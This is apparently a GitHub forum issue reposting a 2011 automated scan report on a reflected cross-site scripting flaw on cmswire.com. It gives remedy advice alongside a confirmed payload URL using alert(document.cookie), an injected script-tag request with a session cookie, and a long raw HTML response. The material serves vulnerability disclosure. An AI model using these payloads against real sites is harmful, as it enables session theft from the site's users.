search

FGF-College-Work / Forum

:beer: Espaço dedicado a discussões e tira dúvida sobre disciplinas e conteúdo tecnológico.
MIT License
13 stars 4 forks source link

Reflected XSS, CWE-79, CAPEC-86, cmswire.com REPORT SUMMARY #163

Open marcialwushu opened 5 years ago

marcialwushu commented 5 years ago

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

TARGET URL http://www.cmswire.com/cms/web-publishing/wor...
SCAN DATE 4/22/2011 9:22:18 PM
REPORT DATE 4/22/2011 9:37:45 PM
SCAN DURATION 00:07:52

GHDB, DORK Tests

PROFILE Previous Settings
ENABLED ENGINES Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting

VULNERABILITY SUMMARY

URL Parameter Method Vulnerability Confirmed
/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(document.cookie)-%224959465b364%2527 Query Based QUERYSTRING Cross-site Scripting Yes
    Cookie Not Marked As HttpOnly Yes
    Apache Version Disclosure No

Cross-site Scripting

XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser. XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(document.cookie)-%224959465b364%2527 CONFIRMED

http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"-->

Request

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(document.cookie)-%224959465b364%2527?'"--></style></script><script>netsparker(0x0000AF)</script> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.cmswire.com
Cookie: PHPSESSID=46b4bd41b5eef5c3a961c2cea3b72653
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 03:29:25 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: max-age=1200
Expires: Sat, 23 Apr 2011 03:49:25 GMT
Vary: Accept-Encoding
Content-Encoding: 
Content-Length: 16603
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head>    <title>WordPress 3.1: &quot;More of a CMS than ever before&quot;</title>    <link rel="stylesheet" href="/shared/css/screen.css?v=2010121001" type="text/css" />    <script type="text/javascript" language="javascript" src="/shared/js/obfuscator.js"></script>   <!-- GAM -->    <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script> <script type="text/javascript"> GS_googleAddAdSenseService("ca-pub-1667386052178664");  GS_googleEnableAllServices();   </script>   <script type="text/javascript"> GA_googleAddAttr("page_url", "_cms_web-publishing_wordpress-31-more-of-a-cms-than-ever-before-010310_php_81d20%22-alert(document_cookie)-%224959465b364%2527"); </script>   <link rel="canonical" href="http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(document.cookie)-%224959465b364%2527" />    <!-- YUI: Combo-handled, on CDN --> <link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.6.0/build/fonts/fonts-min.css&amp;2.6.0/build/container/assets/skins/sam/container.css" /> <script type="text/javascript" src="http://yui.yahooapis.com/combo?2.6.0/build/yahoo-dom-event/yahoo-dom-event.js&amp;2.6.0/build/animation/animation-min.js&amp;2.6.0/build/connection/connection-min.js&amp;2.6.0/build/dragdrop/dragdrop-min.js&amp;2.6.0/build/container/container-min.js"></script>   <!-- jQuery on CDN -->  <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>  <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script> <link type="text/css" href="/shared/css/jq_themes/ui-lightness/jquery-ui-1.7.1.custom.css" rel="stylesheet" />  <script type="text/javascript" src="/shared/js/jquery.dialog-1.72.min.js"></script> <script type="text/javascript"> jQuery.noConflict();    /** * Featured Block Init   *********************************************************/  function featuredBlockInit() {  if(getCookie("Newsletter_Subscribed") == '' && getCookie("Featured_Hidden") == '') {    jQuery("#featured").slideDown(); jQuery("#frmESub_Featured").attr("action", "http://www.aweber.com/scripts/addlead.pl");    gaRecordEvent("Featured", "Displayed", ""); jQuery("#btnCloseFeatured").click(function() {  jQuery("#featured").slideUp("slow");    setCookie("Featured_Hidden", 1); //session scope    gaRecordEvent("Featured", "Closed-General", "");    }); jQuery("#lnkDejaSubed").click(function() {  jQuery("#featured").slideUp("slow");    setCookie("Newsletter_Subscribed", 1, new Date("1/1/2020"));    gaRecordEvent("Featured", "Closed-Subscribed", ""); }); }   }   </script>   <!-- chart beat #1 --> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <link rel="alternate" type="application/rss+xml" title="CMSWire - All News" href="http://feeds2.feedburner.com/CMSWire" />    <link rel="alternate" type="application/rss+xml" title="CMSWire - Job Listings" href="http://feeds2.feedburner.com/CMSWire-AllJobPosts" />  <link rel="alternate" type="application/rss+xml" title="CMSWire - Upcoming Events" href="http://feeds2.feedburner.com/CMSWire-Events" /> <link rel="shortcut icon" href="/favicon.ico" />   <link rel="home start me" href="/" />   <link rel="me" type="text/html" href="http://www.google.com/profiles/cmswire" /> <link rel="me" type="text/html" href="http://twitter.com/cmswire" /> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />    <meta name="ICBM" content="37.80018, -122.40908" /> <meta http-equiv="distribution" content="Global" /> <meta name="copyright" content="Copyright 2003-2011 Simpler Media Group, Inc." /> <meta name="robots" content="all,index,follow" /> <meta name="rating" content="general" /> <meta name="language" content="en-us" />   <meta name="verify-v1" content="HdocqHqkIh/dBv6gbC1hYzp8AZFAws0DzzDbycC/O88=" />    <script type="text/javascript"> var contentAuthor = "Chelsi Nakano";    GA_googleAddAttr("tags", "cms");    GA_googleAddAttr("tags", "cmswire");    GA_googleAddAttr("tags", "web_publishing"); GA_googleAddAttr("tags", "open_source");    GA_googleAddAttr("tags", "web_cms");    GA_googleAddAttr("tags", "web_publishing"); GA_googleAddAttr("tags", "wordpress"); GA_googleAddAttr("tags", "wordpress_31");    </script>   <script type="text/javascript"> GA_googleAddSlot("ca-pub-1667386052178664", "Sitewide-Top_728");    GA_googleAddSlot("ca-pub-1667386052178664", "Side-Right_160x300");  GA_googleAddSlot("ca-pub-1667386052178664", "Article-Top_468x15"); GA_googleAddSlot("ca-pub-1667386052178664", "Side-Sky_160x600"); GA_googleAddSlot("ca-pub-1667386052178664", "Inline-300x250--01");  GA_googleAddSlot("ca-pub-1667386052178664", "Side-Right-Sky_160x600");  GA_googleAddSlot("ca-pub-1667386052178664", "Popup-Newsletter");    GA_googleAddSlot("ca-pub-1667386052178664", "Popup-Poll");  GA_googleAddSlot("ca-pub-1667386052178664", "Article-Base_600x200");    GA_googleAddSlot("ca-pub-1667386052178664", "Article-Base_300x250");    GA_googleFetchAds();    </script>   <meta name="title" content="WordPress 3.1: &quot;More of a CMS than ever before&quot;" />   <meta name="description" content="After various setbacks and a postponed release date, the WordPress (news, site) team finally bestowed version 3.1 (a.k.a. &ldquo;Reinhardt&rdquo;) on Wednesday this week. Named in honor of the jazz guitarist Django Reinhard, the update focuses on content management, workflow and admin features.&nbsp;. Topic: Web Publishing" /> <meta name="keywords" content="cms, cmswire, Web Publishing, open source, web cms, web publishing, wordpress, wordpress 3.1" />  <!-- Dublin Core -->    <link rel="schema.DC" href="http://purl.org/dc/elements/1.1/" />    <meta name="DC.format" content="text/html" />   <meta name="DC.language" content="en" />    <meta name="DC.publisher" content="Simpler Media Group" />  <meta name="DC.title" content="WordPress 3.1: &quot;More of a CMS than ever before&quot;" />    <meta name="DC.description" content="After various setbacks and a postponed release date, the WordPress (news, site) team finally bestowed version 3.1 (a.k.a. &ldquo;Reinhardt&rdquo;) on Wednesday this week. Named in honor of the jazz guitarist Django Reinhard, the update focuses on content management, workflow and admin features.&nbsp;. Topic: Web Publishing" />   <meta name="DC.rights" content="Copyright 2003-2011 Simpler Media Group" /> <meta name="DC.creator" content="Chelsi Nakano" /> <meta name="DC.indentifier" content="http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php" /><meta name="medium" content="news" />   <meta name="DC.subject" content="cms, cmswire, Web Publishing, open source, web cms, web publishing, wordpress, wordpress 3.1" />   <!-- /Dublin Core -->   <link rel="start" href="http://www.cmswire.com/" title="Home" />    <script type="text/javascript">var mtObjId = 0; var mtObjType = "";</script>    <script type="text/javascript"> var isIndividualArchive = true; var HOST = 'http://www.cmswire.com';    var mtEntryID = '10310';    var mtEntryTitle = "WordPress 3.1: &quot;More of a CMS than ever before&quot;"; var mtEntryPermalink = 'http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php';  var commentSpamWarning = 0; //stat tracking items   mtObjId = '10310';  mtObjType = 'entry';</script>   <script type="text/javascript">var $ = YAHOO.util.Dom.get;</script> <script type="text/javascript" async="async">   var img = new Image();  if (typeof commenter_id == 'undefined') { var commenter_id = ''; }  img.src = "http://www.cmswire.com/stats.php?u=" + escape(document.location.href) + "&r=" + escape(document.referrer) + "&a=" + commenter_id + "&b=1" + "&t=" + mtObjType    + "&i=" + mtObjId;  </script> <!-- GAnalytics Async --> <script type="text/javascript"> var _gaq = _gaq || []; var _authorName = (typeof(contentAuthor) != "undefined") ? contentAuthor : "System"; _gaq.push(['_setAccount', 'UA-202362-1']);  _gaq.push(['_trackPageview']);  _gaq.push(['_trackEvent', 'PageViewByAuthor', _authorName, location.pathname]); (function() {   var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';   var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);   })();   </script> </head><body class="yui-skin-sam">    <div id="wrap" style="margin-top:12px;">    <div id="pre-container">    <div id="top-utils">    <a href="/about/" title="about cmswire..."  onclick="if(pageTracker){pageTracker._trackEvent('Click - Internal', 'Util Nav', this.innerHTML);}" >about us</a>   | <a href="/cms/resources/" title="CMS Resources..." onclick="if(pageTracker){pageTracker._trackEvent('Click - Internal', 'Util Nav', this.innerHTML);}"    >research resources</a> | <a href="/about/#contact" title="Contact information..."  onclick="if(pageTracker){pageTracker._trackEvent('Click - Internal', 'Util Nav', this.innerHTML);}" >contact us</a> | <a href="/mediakit/"  title="Advertising information..."  onclick="if(pageTracker){pageTracker._trackEvent('Click - Internal', 'Util Nav', this.innerHTML);}" >advertise here</a></div>   </div>  <div id="CBTop"></div>  <div id="content-body"> <div id="logo-head" style="margin-top:-18px;margin-bottom:5px;"> <!-- CMSWireLogo_v2-02.png --> <a href="http://www.cmswire.com/"   rel="home"  title="Content Management System (CMS) News, Reviews, Events and Analysis."><img src="/images/CMSWireLogo_v2-02.png" width="229" height="51"    alt="Content Management (CMS), Information Management, Enterprise Collaboration, Web Engagement." /></a></div><div class="spacer">&nbsp;</div><!-- <span id="tag-line">Content Management Matters &trade;</span> --><div class="alt-me float-l">    <ul>    <li><a id="lnk_email-sub-top-icon" class="email-sub"    href="#event-sub" title="Join newsletter..."    onclick="if(pageTracker){pageTracker._trackEvent('Click - Internal', 'Under Logo', 'Newsletter');}" ><img src="/images/ico-cw_newsletter_16x16.gif" alt="Tune-in via Email" align="bottom" width="16" height="16" /></a> <a id="lnk_email-sub-top-text" class="email-sub"   href="#event-sub" onclick="if(pageTracker){pageTracker._trackEvent('Click - Internal', 'Under Logo', 'Newsletter');}"   title="Join newsletter...">Newsletter</a>   </li>   <li><a href="http://twitter.com/cmswire" title="Follow us on Twitter..." onclick="if(pageTracker){pageTracker._trackEvent('Click - Internal', 'Under Logo', 'Twitter');}" rel="me"><img src="/images/ico-cw_twitter_16x16.jpg" alt="Follow us on Twitter..." align="bottom" width="16" height="16" /></a>   <a href="http://twitter.com/cmswire" title="Follow us on Twitter..." onclick="if(pageTracker){pageTracker._trackEvent('Click - Internal', 'Under Logo', 'Twitter');}" rel="me">Twitter</a>  </li>   <li>&nbsp;<a href="http://feeds.feedburner.com/CMSWire" onclick="if(pageTracker){pageTracker._trackPageview('/event/out/feed-click/under-logo');pageTracker._trackEvent('Click - Internal', 'Under Logo', 'RSS');}" title="Add our main news feed..." rel="alternate"   ><img src="/images/ico-cw_rss_16x16.jpg" alt="Add our main news feed..." align="bottom" width="16" height="16" /></a> <a href="http://feeds.feedburner.com/CMSWire" onclick="if(pageTracker){pageTracker._trackPageview('/event/out/feed-click/under-logo');pageTracker._trackEvent('Click - Internal', 'Under Logo', 'RSS');}" title="Add our main RSS feed..." rel="alternate">RSS Feed</a>   </li>   </ul></div><div id="ams-top-728x90">    <script type="text/javascript"> GA_googleFillSlot("Sitewide-Top_728"); </script></div>  <div class="spacer" style="height:10px">&nbsp;</div><div id="gn">   <div id="gn-menu">  <ul> <li><a href="/">Latest News</a>    <div>   <ul>    <li><a  title="Read featured articles..." href="/cms/featured-articles/">Features</a></li>  <li><a  title="Read interviews..." href="/news/topic/interviews">Interviews</a></li>    <li><a title="CMS and related product reviews..."   href="/cms/cms-reviews/">Product Reviews</a></li>   <li class="separator">---------</li>    <li><a href="/cms/web-cms/" title="Web CMS">Web CMS</a></li>    <li><a href="/cms/enterprise-cms/"  title="Enterprise CMS">Enterprise CMS</a></li>  <li><a href="/cms/document-management/" title="Document management">Document Management</a></li>    <li><a href="/cms/web-engagement/" title="Make the Web a more engaging place...">Web Engagement</a></li>    <li><a href="/cms/digital-asset-management/" title="DAM">Digital Asset Management</a></li>  <li><a href="/cms/web-publishing/" title="Web CMS">Web Publishing</a></li>  <li><a href="/cms/enterprise-20/" title="Enterprise 2.0">Enterprise 2.0</a></li>    <li><a href="/cms/web-content/" title="Optimizing Web Content">Web Optimization</a></li>    <li><a href="/news/topic/social+media" title="Social Media">Social Media</a></li>   <li><a href="/news/topic/web+development"   title="Web Development">Web Development</a></li>    <li><a href="/news/topic/mobile/" title="Mobile">Mobile</a></li>    <li class="separator">---------</li>    <li><a href="/">Front Page</a></li> <li><a href="/news/topics/" title="View topic cloud...">All Topics</a></li> <li><a target="_blank"  href="http://feeds.feedburner.com/CMSWire"><img src="/images/ico_feed-10x10.gif" alt="" />&nbsp;Full RSS Feed</a></li>  </ul>   </div>  </li>   <li><a href="/cms/products/">Software Directory</a> <div style="width:250px">   <ul>    <li><a href="/cms/products/#prod-wcm">Web CMS List</a></li> <li><a  href="/cms/products/#prod-dms" title="Document management software" >Doc Management List</a></li>   <li><a href="/cms/products/#prod-ecm">Enterprise CMS List</a></li>  <li><a href="/cms/products/#prod-dam">DAM Software List</a></li>    <li><a href="/cms/products/#prod-cm-micro">Micro CMS &#38; Blogging</a></li>    <li><a href="/cms/products/#prod-smm" title="Social media monitoring software"  >Social Media Monitoring</a></li>   <li><a href="/cms/products/#prod-mig">Migration Tools</a></li>  <li class="separator">---------</li>    <li><a hr..

XSS.CS

CLOUDSCAN BLOG